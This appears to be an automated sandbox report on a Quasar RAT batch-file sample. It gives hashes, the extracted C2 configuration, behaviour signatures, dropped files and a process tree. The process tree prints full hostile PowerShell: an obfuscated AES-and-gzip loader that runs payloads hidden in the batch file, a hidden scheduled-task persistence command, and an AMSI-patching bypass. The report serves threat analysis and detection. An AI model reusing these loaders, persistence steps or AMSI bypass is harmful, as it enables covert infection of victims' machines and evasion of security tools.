Overview

overview

10

Static

static

1

$sxr-Uni2.bat

windows10-1703-x64

10

$sxr-Uni2.bat

windows10-2004-x64

8

$sxr-Uni2.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    28s
  • max time network
    23s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    31-05-2024 22:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    $sxr-Uni2.bat

  • Size

    796KB

  • MD5

    03137a8d9aaa39d4266d6cafecc5ccb2

  • SHA1

    65ab5f05615d7aeb12a8f64f2339af341172784d

  • SHA256

    7fca260b4dbeac5ef0255577b3502e6658ca6661f80ad9583673f656c3e67a64

  • SHA512

    a950fe4fcee799aec313c08dc93535f0af463ab3953fb054288230ed30099ff98de5e12a6485e35a11a90a1f41c3043f5270274d29de7ed25c98356015084226

  • SSDEEP

    12288:sJOiyoo1m8Y8HvatsI8a0XNQ7UCPWa/9SC+KSXs+kYWjJ4rT+/mq6z4Q4uatxyG:sciyK8YzJ8BwUCPTwC+KysEWjG+D6l4b

Score
10/10
quasarslaveexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

127.0.0.1:4782

Mutex

$Sxr-mRtuuIZppUEbmX171W

Attributes
  • encryption_key

    s5xN6p335pnxD0WJMnnQ

  • install_name

    $sxr-powershell.exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

  • startup_key

    Powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 32 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$sxr-Uni2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1744
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YdrnMYixViSdjvLypkvDjeezo9AbG2F3sYXUntuddvQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IBVidKouSC6beP8nLs4RNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sjCYq=New-Object System.IO.MemoryStream(,$param_var); $HKxSP=New-Object System.IO.MemoryStream; $rfbZc=New-Object System.IO.Compression.GZipStream($sjCYq, [IO.Compression.CompressionMode]::Decompress); $rfbZc.CopyTo($HKxSP); $rfbZc.Dispose(); $sjCYq.Dispose(); $HKxSP.Dispose(); $HKxSP.ToArray();}function execute_function($param_var,$param2_var){ $qIGNe=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ELzZY=$qIGNe.EntryPoint; $ELzZY.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$sxr-Uni2.bat';$mxwBI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$sxr-Uni2.bat').Split([Environment]::NewLine);foreach ($VNnmR in $mxwBI) { if ($VNnmR.StartsWith(':: ')) { $XFJot=$VNnmR.Substring(3); break; }}$payloads_var=[string[]]$XFJot.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4240
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_386_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_386.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3604
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_386.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4000
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_386.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2528
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YdrnMYixViSdjvLypkvDjeezo9AbG2F3sYXUntuddvQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IBVidKouSC6beP8nLs4RNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sjCYq=New-Object System.IO.MemoryStream(,$param_var); $HKxSP=New-Object System.IO.MemoryStream; $rfbZc=New-Object System.IO.Compression.GZipStream($sjCYq, [IO.Compression.CompressionMode]::Decompress); $rfbZc.CopyTo($HKxSP); $rfbZc.Dispose(); $sjCYq.Dispose(); $HKxSP.Dispose(); $HKxSP.ToArray();}function execute_function($param_var,$param2_var){ $qIGNe=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ELzZY=$qIGNe.EntryPoint; $ELzZY.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_386.bat';$mxwBI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_386.bat').Split([Environment]::NewLine);foreach ($VNnmR in $mxwBI) { if ($VNnmR.StartsWith(':: ')) { $XFJot=$VNnmR.Substring(3); break; }}$payloads_var=[string[]]$XFJot.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:668
            • C:\Users\Admin\AppData\Local\Temp\Install.exe
              "C:\Users\Admin\AppData\Local\Temp\Install.exe"
              6⤵
              • Executes dropped EXE
              PID:4256
            • C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe
              "C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe"
              6⤵
              • Executes dropped EXE
              PID:2788
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QdNAovbFrDBM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wkEdfDdRnXwNIT,[Parameter(Position=1)][Type]$EYgdFGuPVp)$eJeFlSxLuiL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+'c'+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+'e'+[Char](109)+'or'+[Char](121)+''+[Char](77)+'od'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+'eal'+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+'s'+'i'+''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$eJeFlSxLuiL.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+'p'+''+[Char](101)+'c'+'i'+''+'a'+'l'+'N'+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'i'+[Char](100)+''+'e'+'B'+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wkEdfDdRnXwNIT).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+'m'+''+'e'+''+','+'Ma'+'n'+'a'+'g'+'e'+[Char](100)+'');$eJeFlSxLuiL.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+'k'+'e','P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+'g,N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$EYgdFGuPVp,$wkEdfDdRnXwNIT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+'e,Man'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $eJeFlSxLuiL.CreateType();}$OwMMmzGecQJHF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+'t'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+'W'+'i'+''+[Char](110)+''+'3'+'2'+'.'+'U'+[Char](110)+'s'+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+'tiv'+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$kVGGgxPBIolGTb=$OwMMmzGecQJHF.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'ocAd'+[Char](100)+''+'r'+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gojSVSmVrHJnhuFCXFY=QdNAovbFrDBM @([String])([IntPtr]);$AMkskOpksUurSUSGSFLNaN=QdNAovbFrDBM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YYWdzlPYrwS=$OwMMmzGecQJHF.GetMethod('Ge'+'t'+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$oaRJvGfkNutrUZ=$kVGGgxPBIolGTb.Invoke($Null,@([Object]$YYWdzlPYrwS,[Object]('L'+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$hmvDzVACQwoDUSvpT=$kVGGgxPBIolGTb.Invoke($Null,@([Object]$YYWdzlPYrwS,[Object]('V'+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+'t'+'e'+''+[Char](99)+''+[Char](116)+'')));$ENNTbUT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oaRJvGfkNutrUZ,$gojSVSmVrHJnhuFCXFY).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+'.'+'d'+''+[Char](108)+'l');$LmoqQuxWZrQuJKMcS=$kVGGgxPBIolGTb.Invoke($Null,@([Object]$ENNTbUT,[Object](''+'A'+'ms'+'i'+''+'S'+'ca'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$OgMbMHpSkY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hmvDzVACQwoDUSvpT,$AMkskOpksUurSUSGSFLNaN).Invoke($LmoqQuxWZrQuJKMcS,[uint32]8,4,[ref]$OgMbMHpSkY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LmoqQuxWZrQuJKMcS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hmvDzVACQwoDUSvpT,$AMkskOpksUurSUSGSFLNaN).Invoke($LmoqQuxWZrQuJKMcS,[uint32]8,0x20,[ref]$OgMbMHpSkY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+'W'+'A'+[Char](82)+'E').GetValue('$sx'+[Char](114)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    PID:1636

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    ac3d19fbb5c5f10833f1882308f77548

    SHA1

    ac880466fd99a5719fedc7289b00d78ba7088e06

    SHA256

    3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df

    SHA512

    b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    45KB

    MD5

    5f640bd48e2547b4c1a7421f080f815f

    SHA1

    a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

    SHA256

    916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

    SHA512

    a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    17KB

    MD5

    b443a94a57a7fb2be6fa76b6d7278eea

    SHA1

    d85e1d26fe98d4c196b1e82704eff5d70a98fe20

    SHA256

    292481d5ad73e735b95a6963a88535c77caab85f6445d2fec4014aae4945e657

    SHA512

    1c87e2417f399ff566456b8588b3d191a16029298de6aa1993288d900806a7941b27bfe221e6f46232c3c6420046bb21a3da17ff132d13fc9a484899d90ff8ea

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\Install.exe
    Filesize

    163KB

    MD5

    79e7a0f8ec98e351c491023605881537

    SHA1

    065146d5cbf73fef9d8f43bc9bd761959cb17486

    SHA256

    2b9c94fa4a0091e7be78ec8706b91e2f452b0192e48720dfa6216380b37c81b7

    SHA512

    e0630b588c8926da10b5880ca6f49fba32bd28cbf02b58692bea693fa4ede29a01dba9b4029916e1fcca2e38d447598cffe63cf91705f638a897b131304c20b0

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe
    Filesize

    139KB

    MD5

    84231ecf2715509d921283d32351d4cd

    SHA1

    cbb51ee26cb2c50621bbab170ea8696f84800090

    SHA256

    d36b177e6c58e67045da5a607f0b5d74ea56b06220216f5e2046557c8195b0f4

    SHA512

    997af01ae49cbb45857b664f182a912d7a604c18838bf75964228d19a75df0968b16e15a692a577f457e5f2875eb3bd4dca5861744d816dfbb80abc34ce35a81

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jid44prf.1se.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    Download Submit
  • C:\Users\Admin\AppData\Roaming\startup_str_386.bat
    Filesize

    796KB

    MD5

    03137a8d9aaa39d4266d6cafecc5ccb2

    SHA1

    65ab5f05615d7aeb12a8f64f2339af341172784d

    SHA256

    7fca260b4dbeac5ef0255577b3502e6658ca6661f80ad9583673f656c3e67a64

    SHA512

    a950fe4fcee799aec313c08dc93535f0af463ab3953fb054288230ed30099ff98de5e12a6485e35a11a90a1f41c3043f5270274d29de7ed25c98356015084226

    Download Submit
  • C:\Users\Admin\AppData\Roaming\startup_str_386.vbs
    Filesize

    115B

    MD5

    6ba11f355d4a73b498c6aecb24f0fc61

    SHA1

    0be6659d8ff819bb3e81ee0c4238141964febef2

    SHA256

    8b504994e1860b8ff852c0f1b2d9c4e99ea4c0fcb81e12303f26d885ddaec70e

    SHA512

    a3b20fcab150d0af2d7d606497d6f3eb0bbf0452b01de07f8f1ee52345d127236c2e4391cb2fade4ad23369992cd2f9ed347ddc039a9286d2f471bcc2a166d7a

    Download Submit
  • memory/668-209-0x00000000093C0000-0x0000000009452000-memory.dmp
    Filesize

    584KB

    Download
  • memory/668-208-0x00000000091C0000-0x000000000922C000-memory.dmp
    Filesize

    432KB

    Download
  • memory/668-234-0x0000000009020000-0x0000000009032000-memory.dmp
    Filesize

    72KB

    Download
  • memory/1636-230-0x0000020367940000-0x0000020367962000-memory.dmp
    Filesize

    136KB

    Download
  • memory/1636-233-0x0000020367A70000-0x0000020367AE6000-memory.dmp
    Filesize

    472KB

    Download
  • memory/3604-167-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/3604-66-0x0000000009B00000-0x0000000009B1E000-memory.dmp
    Filesize

    120KB

    Download
  • memory/3604-163-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/3604-75-0x0000000009E70000-0x0000000009F04000-memory.dmp
    Filesize

    592KB

    Download
  • memory/3604-74-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/3604-72-0x0000000009BA0000-0x0000000009C45000-memory.dmp
    Filesize

    660KB

    Download
  • memory/3604-45-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/3604-46-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/3604-47-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/3604-64-0x0000000009B40000-0x0000000009B73000-memory.dmp
    Filesize

    204KB

    Download
  • memory/3604-65-0x0000000070B70000-0x0000000070BBB000-memory.dmp
    Filesize

    300KB

    Download
  • memory/3604-67-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/4240-144-0x0000000073F9E000-0x0000000073F9F000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4240-14-0x0000000008A20000-0x0000000008A6B000-memory.dmp
    Filesize

    300KB

    Download
  • memory/4240-73-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/4240-34-0x0000000009930000-0x00000000099DE000-memory.dmp
    Filesize

    696KB

    Download
  • memory/4240-33-0x0000000004B70000-0x0000000004B78000-memory.dmp
    Filesize

    32KB

    Download
  • memory/4240-31-0x0000000009F40000-0x000000000A5B8000-memory.dmp
    Filesize

    6.5MB

    Download
  • memory/4240-162-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/4240-32-0x00000000095A0000-0x00000000095BA000-memory.dmp
    Filesize

    104KB

    Download
  • memory/4240-0-0x0000000073F9E000-0x0000000073F9F000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4240-26-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/4240-15-0x0000000008810000-0x0000000008886000-memory.dmp
    Filesize

    472KB

    Download
  • memory/4240-35-0x000000000C5C0000-0x000000000CABE000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/4240-13-0x0000000007F80000-0x0000000007F9C000-memory.dmp
    Filesize

    112KB

    Download
  • memory/4240-181-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/4240-10-0x0000000008110000-0x0000000008460000-memory.dmp
    Filesize

    3.3MB

    Download
  • memory/4240-9-0x00000000080A0000-0x0000000008106000-memory.dmp
    Filesize

    408KB

    Download
  • memory/4240-8-0x0000000007E50000-0x0000000007EB6000-memory.dmp
    Filesize

    408KB

    Download
  • memory/4240-7-0x0000000007DB0000-0x0000000007DD2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/4240-6-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/4240-5-0x0000000007780000-0x0000000007DA8000-memory.dmp
    Filesize

    6.2MB

    Download
  • memory/4240-4-0x0000000073F90000-0x000000007467E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/4240-3-0x0000000005080000-0x00000000050B6000-memory.dmp
    Filesize

    216KB

    Download